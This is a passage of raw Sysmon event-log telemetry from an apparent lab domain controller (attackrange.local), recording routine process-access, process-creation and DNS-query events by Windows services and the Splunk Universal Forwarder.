15:51:19.453{D28789B6-7C77-5FA1-5700-000000008801}3908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.347{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C77-5FA1-5600-000000008801}4004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.347{D28789B6-7C77-5FA1-5600-000000008801}40043996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5600-000000008801}4004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5600-000000008801}4004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.097{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C77-5FA1-5600-000000008801}4004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.108{D28789B6-7C77-5FA1-5600-000000008801}4004C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 22542200x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.535{D28789B6-7C62-5FA1-0B00-000000008801}868win-dc-807010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.370{D28789B6-7C73-5FA1-3000-000000008801}2696win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.050{D28789B6-7C76-5FA1-5500-000000008801}32444084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6500-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 